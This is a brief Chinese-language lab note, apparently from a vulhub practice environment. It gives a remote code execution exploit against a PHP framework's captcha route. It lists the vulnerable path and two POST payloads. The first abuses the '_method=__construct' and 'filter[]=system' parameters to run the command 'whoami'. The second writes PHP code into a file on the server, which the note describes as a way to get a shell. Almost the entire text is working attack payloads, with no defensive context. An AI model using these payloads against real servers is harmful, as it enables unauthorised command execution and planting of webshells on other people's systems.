vulhub靶场
利用位置
/index.php?s=captcha
POST data为:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
还可以利用echo将一句话重定向到固定文件,从而getshell
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php phpinfo();?>" >> test.php
利用成功